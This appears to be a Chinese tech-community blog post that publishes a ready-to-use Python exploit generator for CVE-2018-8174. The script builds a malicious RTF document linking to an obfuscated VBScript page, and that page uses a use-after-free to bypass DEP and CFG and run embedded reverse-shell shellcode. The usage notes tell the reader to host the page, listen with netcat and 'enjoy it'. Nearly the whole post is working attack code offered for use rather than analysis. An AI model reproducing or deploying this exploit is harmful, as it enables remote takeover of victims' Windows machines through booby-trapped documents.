前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2018-8174 EXP 0day python

CVE-2018-8174 EXP 0day python

作者头像
伍尚国
发布2018-09-11 10:56:11
1.7K0
发布2018-09-11 10:56:11
举报
文章被收录于专栏:尚国

usage: CVE-2018-8174.py [-h] -u URL -o OUTPUT [-i IP] [-p PORT]

Exploit for CVE-2018-8174

optional arguments: -h, --help show this help message and exit -u URL, --url URL exp url -o OUTPUT, --output OUTPUT Output exploit rtf -i IP, --ip IP ip for netcat -p PORT, --port PORT port for netcat

eg:

  1. python CVE-2018-8174.py -u http://1.1.1.1/exploit.html -o exp.rtf -i 2.2.2.2 -p 4444
  2. put exploit.html on your server (1.1.1.1)
  3. netcat listen on [any] 4444 (2.2.2.2)

enjoy it !

POC:

代码语言:javascript
复制
  1 import argparse
  2 import struct
  3 
  4 SampleRTF = R"""{\rtf1\ansi\ansicpg1252\deff0\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
  5 {\*\generator Msftedit 5.41.21.2510;}\viewkind4\uc1\pard\sa200\sl276\slmult1\lang9\f0\fs22{\object\objautlink\objupdate\rsltpict\objw4321\objh4321{\*\objclass htmlfile}{\*\objdata 0105000002000000090000004f4c45324c696e6b000000000000000000000a0000
  6 d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
  7 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
  8 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
  9 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 10 fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 11 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 12 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 13 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 14 ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000903b
 15 beae04f2d30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
 16 000000000000000000000000f20000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
 17 0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
 18 000000000000000000000000050000008100000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 19 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 20 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 21 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 22 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000021000c0000005f31353838343937393534000000000080000000e0c9ea79f9bace118c8200aa004ba90b68000000
 23 UNICODE_URL
 24 000000795881f43b1d7f48af2c825dc485276300000000a5ab0000ffffffff20693325f903cf118fd000aa00686f1300000000ffffffff0000
 25 000000000000e05dd6ab04f2d30100000000000000000000000000000000000000000000100203000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002700
 26 NORMAL_URL
 27 0000bbbbcccc2700
 28 UNICODE_URL
 29 0000000000000000000000000000000000000000000000000000
 30 0000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000d0000004d45544146494c45504943540000000000000000005e0000000800000000000000
 31 0100090000032b00000000000500000000000400000003010800050000000b0200000000050000000c0200000000030000001e00050000000d0200000000050000000d0200000000040000002701ffff030000000000}
 32 }\par
 33 }
 34 """
 35 
 36 SampleHTML = R"""
 37 <!doctype html>
 38 <html lang="en">
 39 <head>
 40 <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
 41 <meta http-equiv="x-ua-compatible" content="IE=10">
 42 <meta http-equiv="Expires" content="0">
 43 <meta http-equiv="Pragma" content="no-cache">
 44 <meta http-equiv="Cache-control" content="no-cache">
 45 <meta http-equiv="Cache" content="no-cache">
 46 </head>
 47 <body>
 48 <script language="vbscript">
 49 Dim lIIl
 50 Dim IIIlI(6),IllII(6)
 51 Dim IllI
 52 Dim IIllI(40)
 53 Dim lIlIIl,lIIIll
 54 Dim IlII
 55 Dim llll,IIIIl
 56 Dim llllIl,IlIIII
 57 Dim NtContinueAddr,VirtualProtectAddr
 58 IlII=195948557
 59 lIlIIl=Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uffff%u7fff%u0000%u0000")
 60 lIIIll=Unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000")
 61 IllI=195890093
 62 Function IIIII(Domain) 
 63     lIlII=0
 64     IllllI=0
 65     IIlIIl=0
 66     Id=CLng(Rnd*1000000)
 67     lIlII=CLng((&h27d+8231-&H225b)*Rnd)Mod (&h137d+443-&H152f)+(&h1c17+131-&H1c99)
 68     If(Id+lIlII)Mod (&h5c0+6421-&H1ed3)=(&h10ba+5264-&H254a) Then
 69         lIlII=lIlII-(&h86d+6447-&H219b)
 70     End If
 71     IllllI=CLng((&h2bd+6137-&H1a6d)*Rnd)Mod (&h769+4593-&H1940)+(&h1a08+2222-&H2255)
 72     IIlIIl=CLng((&h14e6+1728-&H1b5d)*Rnd)Mod (&hfa3+1513-&H1572)+(&h221c+947-&H256e)
 73     IIIII=Domain &"?" &Chr(IllllI) &"=" &Id &"&" &Chr(IIlIIl) &"=" &lIlII
 74 End Function
 75 Function lIIII(ByVal lIlIl)
 76     IIll=""
 77     For index=0 To Len(lIlIl)-1
 78         IIll=IIll &lIlI(Asc(Mid(lIlIl,index+1,1)),2)
 79     Next
 80     IIll=IIll &"00"
 81     If Len(IIll)/(&h15c6+3068-&H21c0) Mod (&h1264+2141-&H1abf)=(&hc93+6054-&H2438) Then
 82         IIll=IIll &"00"
 83     End If
 84     For IIIl=(&h1a1a+3208-&H26a2) To Len(IIll)/(&h1b47+331-&H1c8e)-(&h14b2+4131-&H24d4)
 85         lIIIlI=Mid(IIll,IIIl*(&h576+1268-&Ha66)+(&ha64+6316-&H230f),(&ha49+1388-&Hfb3))
 86         lIlIll=Mid(IIll,IIIl*(&hf82+3732-&H1e12)+(&h210+2720-&Hcaf)+(&h4fa+5370-&H19f2),(&hf82+5508-&H2504))
 87         lIIII=lIIII &"%u" &lIlIll &lIIIlI
 88     Next
 89 End Function
 90 Function lIlI(ByVal Number,ByVal Length)
 91     IIII=Hex(Number)
 92     If Len(IIII)<Length Then
 93         IIII=String(Length-Len(IIII),"0") &IIII    'pad allign with zeros 
 94     Else
 95         IIII=Right(IIII,Length)
 96     End If
 97     lIlI=IIII
 98 End Function
 99 Function GetUint32(lIII)
100     Dim value
101     llll.mem(IlII+8)=lIII+4
102     llll.mem(IlII)=8        'type string
103     value=llll.P0123456789
104     llll.mem(IlII)=2
105     GetUint32=value
106 End Function
107 Function IllIIl(lIII)
108     IllIIl=GetUint32(lIII) And (131071-65536)
109 End Function
110 Function lllII(lIII)
111     lllII=GetUint32(lIII)  And (&h17eb+1312-&H1c0c)
112 End Function
113 Sub llllll
114 End Sub
115 Function GetMemValue
116     llll.mem(IlII)=(&h713+3616-&H1530)
117     GetMemValue=llll.mem(IlII+(&h169c+712-&H195c))
118 End Function
119 Sub SetMemValue(ByRef IlIIIl)
120     llll.mem(IlII+(&h715+3507-&H14c0))=IlIIIl
121 End Sub
122 Function LeakVBAddr
123     On Error Resume Next
124     Dim lllll
125     lllll=llllll
126     lllll=null
127     SetMemValue lllll
128     LeakVBAddr=GetMemValue()
129 End Function
130 Function GetBaseByDOSmodeSearch(IllIll)
131     Dim llIl
132     llIl=IllIll And &hffff0000
133     Do While GetUint32(llIl+(&h748+4239-&H176f))<>544106784 Or GetUint32(llIl+(&ha2a+7373-&H268b))<>542330692
134         llIl=llIl-65536
135     Loop
136     GetBaseByDOSmodeSearch=llIl
137 End Function
138 Function StrCompWrapper(lIII,llIlIl)
139     Dim lIIlI,IIIl
140     lIIlI=""
141     For IIIl=(&ha2a+726-&Hd00) To Len(llIlIl)-(&h2e1+5461-&H1835)
142         lIIlI=lIIlI &Chr(lllII(lIII+IIIl))
143     Next
144     StrCompWrapper=StrComp(UCase(lIIlI),UCase(llIlIl))
145 End Function
146 Function GetBaseFromImport(base_address,name_input)
147     Dim import_rva,nt_header,descriptor,import_dir
148     Dim IIIIII
149     nt_header=GetUint32(base_address+(&h3c))
150     import_rva=GetUint32(base_address+nt_header+&h80)
151     import_dir=base_address+import_rva
152     descriptor=0
153     Do While True
154         Dim Name
155         Name=GetUint32(import_dir+descriptor*(&h14)+&hc)
156         If Name=0 Then
157             GetBaseFromImport=&hBAAD0000
158             Exit Function
159         Else
160             If StrCompWrapper(base_address+Name,name_input)=0 Then
161                 Exit Do
162             End If
163         End If
164         descriptor=descriptor+1
165     Loop
166     IIIIII=GetUint32(import_dir+descriptor*(&h14)+&h10)
167     GetBaseFromImport=GetBaseByDOSmodeSearch(GetUint32(base_address+IIIIII))
168 End Function
169 Function GetProcAddr(dll_base,name)
170     Dim p,export_dir,index
171     Dim function_rvas,function_names,function_ordin
172     Dim Illlll
173     p=GetUint32(dll_base+&h3c)
174     p=GetUint32(dll_base+p+&h78)
175     export_dir=dll_base+p
176     function_rvas=dll_base+GetUint32(export_dir+&h1c)
177     function_names=dll_base+GetUint32(export_dir+&h20)
178     function_ordin=dll_base+GetUint32(export_dir+&h24)
179     index=0
180     Do While True
181         Dim lllI
182         lllI=GetUint32(function_names+index*4)
183         If StrCompWrapper(dll_base+lllI,name)=0 Then
184             Exit Do
185         End If
186         index=index+1
187     Loop
188     Illlll=IllIIl(function_ordin+index*2)
189     p=GetUint32(function_rvas+Illlll*4)
190     GetProcAddr=dll_base+p
191 End Function
192 Function GetShellcode()
193     IIlI=Unescape("%u0000%u0000%u0000%u0000") &Unescape("REPLACE_SHELLCODE_HERE" &lIIII(IIIII("")))
194     IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))
195     GetShellcode=IIlI
196 End Function
197 Function EscapeAddress(ByVal value)
198     Dim High,Low
199     High=lIlI((value And &hffff0000)/&h10000,4)
200     Low=lIlI(value And &hffff,4)
201     EscapeAddress=Unescape("%u" &Low &"%u" &High)
202 End Function
203 Function lIllIl
204     Dim IIIl,IlllI,IIlI,IlIII,llllI,llIII,lIllI
205     IlllI=lIlI(NtContinueAddr,8)
206     IlIII=Mid(IlllI,1,2)
207     llllI=Mid(IlllI,3,2)
208     llIII=Mid(IlllI,5,2)
209     lIllI=Mid(IlllI,7,2)
210     IIlI=""
211     IIlI=IIlI &"%u0000%u" &lIllI &"00"
212     For IIIl=1 To 3
213         IIlI=IIlI &"%u" &llllI &llIII
214         IIlI=IIlI &"%u" &lIllI &IlIII
215     Next
216     IIlI=IIlI &"%u" &llllI &llIII
217     IIlI=IIlI &"%u00" &IlIII
218     lIllIl=Unescape(IIlI)
219 End Function
220 Function WrapShellcodeWithNtContinueContext(ShellcodeAddrParam) 'bypass cfg
221     Dim IIlI
222     IIlI=String((100334-65536),Unescape("%u4141"))
223     IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
224     IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
225     IIlI=IIlI &EscapeAddress(&h3000)
226     IIlI=IIlI &EscapeAddress(&h40)
227     IIlI=IIlI &EscapeAddress(ShellcodeAddrParam-8)
228     IIlI=IIlI &String(6,Unescape("%u4242"))
229     IIlI=IIlI &lIllIl()
230     IIlI=IIlI &String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))
231     WrapShellcodeWithNtContinueContext=IIlI
232 End Function
233 Function ExpandWithVirtualProtect(lIlll)
234     Dim IIlI
235     Dim lllllI
236     lllllI=lIlll+&h23
237     IIlI=""
238     IIlI=IIlI &EscapeAddress(lllllI)
239     IIlI=IIlI &String((&hb8-LenB(IIlI))/2,Unescape("%4141"))
240     IIlI=IIlI &EscapeAddress(VirtualProtectAddr)
241     IIlI=IIlI &EscapeAddress(&h1b)
242     IIlI=IIlI &EscapeAddress(0)
243     IIlI=IIlI &EscapeAddress(lIlll)
244     IIlI=IIlI &EscapeAddress(&h23)
245     IIlI=IIlI &String((&400-LenB(IIlI))/2,Unescape("%u4343"))
246     ExpandWithVirtualProtect=IIlI
247 End Function
248 Sub ExecuteShellcode
249     llll.mem(IlII)=&h4d 'DEP bypass
250     llll.mem(IlII+8)=0
251     msgbox(IlII)        'VT replaced
252 End Sub
253 Class cla1
254 Private Sub Class_Terminate()
255     Set IIIlI(IllI)=lIIl((&h1078+5473-&H25d8))
256     IllI=IllI+(&h14b5+2725-&H1f59)
257     lIIl((&h79a+3680-&H15f9))=(&h69c+1650-&Hd0d)
258 End Sub
259 End Class
260 Class cla2
261 Private Sub Class_Terminate()
262     Set IllII(IllI)=lIIl((&h15b+3616-&Hf7a))
263     IllI=IllI+(&h880+542-&Ha9d)
264     lIIl((&h1f75+342-&H20ca))=(&had3+3461-&H1857)
265 End Sub
266 End Class
267 Class IIIlIl
268 End Class
269 Class llIIl
270 Dim mem
271 Function P
272 End Function
273 Function SetProp(Value)
274     mem=Value
275     SetProp=0
276 End Function
277 End Class
278 Class IIIlll
279 Dim mem
280 Function P0123456789
281     P0123456789=LenB(mem(IlII+8))
282 End Function
283 Function SPP
284 End Function
285 End Class
286 Class lllIIl
287 Public Default Property Get P
288 Dim llII
289 P=174088534690791e-324
290 For IIIl=(&h7a0+4407-&H18d7) To (&h2eb+1143-&H75c)
291     IIIlI(IIIl)=(&h2176+711-&H243d)
292 Next
293 Set llII=New IIIlll
294 llII.mem=lIlIIl
295 For IIIl=(&h1729+3537-&H24fa) To (&h1df5+605-&H204c)
296     Set IIIlI(IIIl)=llII
297 Next
298 End Property
299 End Class
300 Class llllII
301 Public Default Property Get P
302 Dim llII
303 P=636598737289582e-328
304 For IIIl=(&h1063+2314-&H196d) To (&h4ac+2014-&Hc84)
305     IllII(IIIl)=(&h442+2598-&He68)
306 Next
307 Set llII=New IIIlll
308 llII.mem=lIIIll
309 For IIIl=(&h7eb+3652-&H162f) To (&h3e8+1657-&Ha5b)
310     Set IllII(IIIl)=llII
311 Next
312 End Property
313 End Class
314 Set llllIl=New lllIIl
315 Set IlIIII=New llllII
316 Sub UAF
317     For IIIl=(&hfe8+3822-&H1ed6) To (&h8b+8633-&H2233)
318         Set IIllI(IIIl)=New IIIlIl
319     Next
320     For IIIl=(&haa1+6236-&H22e9) To (&h1437+3036-&H1fed)
321         Set IIllI(IIIl)=New llIIl
322     Next
323     IllI=0
324     For IIIl=0 To 6
325         ReDim lIIl(1)
326         Set lIIl(1)=New cla1
327         Erase lIIl
328     Next
329     Set llll=New llIIl
330     IllI=0
331     For IIIl=0 To 6
332         ReDim lIIl(1)
333         Set lIIl(1)=New cla2
334         Erase lIIl
335     Next
336     Set IIIIl=New llIIl
337 End Sub
338 Sub InitObjects
339     llll.SetProp(llllIl)
340     IIIIl.SetProp(IlIIII)
341     IlII=IIIIl.mem
342 End Sub
343 Sub StartExploit
344     UAF
345     InitObjects
346     vb_adrr=LeakVBAddr()
347     // Alert "CScriptEntryPointObject Leak: 0x" & Hex(vb_adrr) & vbcrlf & "VirtualTable address: 0x" & Hex(GetUint32(vb_adrr))
348     vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr))
349     // Alert "VBScript Base: 0x" & Hex(vbs_base) 
350     msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll")
351     // Alert "MSVCRT Base: 0x" & Hex(msv_base) 
352     krb_base=GetBaseFromImport(msv_base,"kernelbase.dll")
353     // Alert "KernelBase Base: 0x" & Hex(krb_base) 
354     ntd_base=GetBaseFromImport(msv_base,"ntdll.dll")
355     // Alert "Ntdll Base: 0x" & Hex(ntd_base) 
356     VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect")
357     // Alert "KernelBase!VirtualProtect Address 0x" & Hex(VirtualProtectAddr) 
358     NtContinueAddr=GetProcAddr(ntd_base,"NtContinue")
359     // Alert "KernelBase!VirtualProtect Address 0x" & Hex(NtContinueAddr) 
360     SetMemValue GetShellcode()
361     ShellcodeAddr=GetMemValue()+8
362     // Alert "Shellcode Address 0x" & Hex(ShellcodeAddr) 
363     SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr)
364     lIlll=GetMemValue()+69596
365     SetMemValue ExpandWithVirtualProtect(lIlll)
366     llIIll=GetMemValue()
367     // Alert "Executing Shellcode"
368     ExecuteShellcode
369 End Sub
370 StartExploit
371 </script>
372 </body>
373 </html>
374 """
375 
376 reverseip = '1.1.1.1'
377 reverseport = 4444
378 
379 def create_rtf_file(url,filename):
380     NORMAL_URL = url.encode('hex')+"0"*(78-len(url.encode('hex')))
381     UNICODE_URL = "00".join("{:02x}".format(ord(c)) for c in url)
382     if len(UNICODE_URL) < 154:
383         print 'UNICODE_URL len %d , need to pad ...' % len(UNICODE_URL)
384         UNICODE_URL = UNICODE_URL+"0"*(154 - len(UNICODE_URL))
385     res = SampleRTF.replace('NORMAL_URL',NORMAL_URL).replace('UNICODE_URL',UNICODE_URL)
386     f = open(filename, 'w')
387     f.write(res)
388     f.close()
389     print "Generated "+filename+" successfully"
390 
391 
392 def rev_shellcode(ip,port):
393     ip = [int(i) for i in ip.split(".")]
394     buf =  ""
395     buf += "\xfc\xe9\x8a\x00\x00\x00\x5d\x83\xc5\x0b\x81\xc4\x70"
396     buf += "\xfe\xff\xff\x8d\x54\x24\x60\x52\x68\xb1\x4a\x6b\xb1"
397     buf += "\xff\xd5\x8d\x44\x24\x60\xeb\x5c\x5e\x8d\x78\x60\x57"
398     buf += "\x50\x31\xdb\x53\x53\x68\x04\x00\x00\x08\x53\x53\x53"
399     buf += "\x56\x53\x68\x79\xcc\x3f\x86\xff\xd5\x85\xc0\x74\x59"
400     buf += "\x6a\x40\x80\xc7\x10\x53\x53\x31\xdb\x53\xff\x37\x68"
401     buf += "\xae\x87\x92\x3f\xff\xd5\x54\x68\x44\x01\x00\x00\xeb"
402     buf += "\x39\x50\xff\x37\x68\xc5\xd8\xbd\xe7\xff\xd5\x53\x53"
403     buf += "\x53\x8b\x4c\x24\xfc\x51\x53\x53\xff\x37\x68\xc6\xac"
404     buf += "\x9a\x79\xff\xd5\xe9\x41\x01\x00\x00\xe8\x9f\xff\xff"
405     buf += "\xff\x72\x75\x6e\x64\x6c\x6c\x33\x32\x2e\x65\x78\x65"
406     buf += "\x00\xe8\x71\xff\xff\xff\xe8\xc2\xff\xff\xff\xfc\xe8"
407     buf += "\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
408     buf += "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"
409     buf += "\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01"
410     buf += "\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c"
411     buf += "\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b"
412     buf += "\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac"
413     buf += "\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b"
414     buf += "\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c"
415     buf += "\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44"
416     buf += "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a"
417     buf += "\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73"
418     buf += "\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
419     buf += "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5"
420     buf += "\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0"
421     buf += "\xff\xd5\x97\x6a\x05\x68"+struct.pack("!4B",ip[0],ip[1],ip[2],ip[3])+"\x68\x02\x00"
422     buf += struct.pack("!H",port)+"\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
423     buf += "\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0"
424     buf += "\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57"
425     buf += "\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44"
426     buf += "\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50"
427     buf += "\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc"
428     buf += "\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08"
429     buf += "\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95"
430     buf += "\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05"
431     buf += "\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
432 
433     return buf.encode("hex")
434 
435 def gen_shellcode(s):
436     n = len(s)
437     i = 0
438     strs = ''
439     if n % 4 == 2:
440         s=s+'41'
441     while i <n:
442         strs += '%u'+s[i+2:i+4]+s[i:i+2]
443         i+=4
444     return strs
445 
446 if __name__ == '__main__':
447     parser = argparse.ArgumentParser(description="Exploit for CVE-2018-8174")
448     parser.add_argument("-u", "--url", help="exp url", required=True)
449     parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
450     parser.add_argument('-i', "--ip", help="ip for netcat", required=False)
451     parser.add_argument('-p', "--port", help="port for netcat", required=False)
452     args = parser.parse_args()
453     url = args.url
454     filename = args.output
455     create_rtf_file(url,filename)
456     if args.ip and args.port:
457         ip = str(args.ip)
458         port = int(args.port)
459         shellcode = gen_shellcode(rev_shellcode(ip,port))
460     else:
461         shellcode = gen_shellcode(rev_shellcode(reverseip,reverseport))
462     res = SampleHTML.replace('REPLACE_SHELLCODE_HERE',shellcode)
463     f = open('exploit.html', 'w')
464     f.write(res)
465     f.close()
466 
467     print "!!! Completed !!!"
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2018-05-30 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档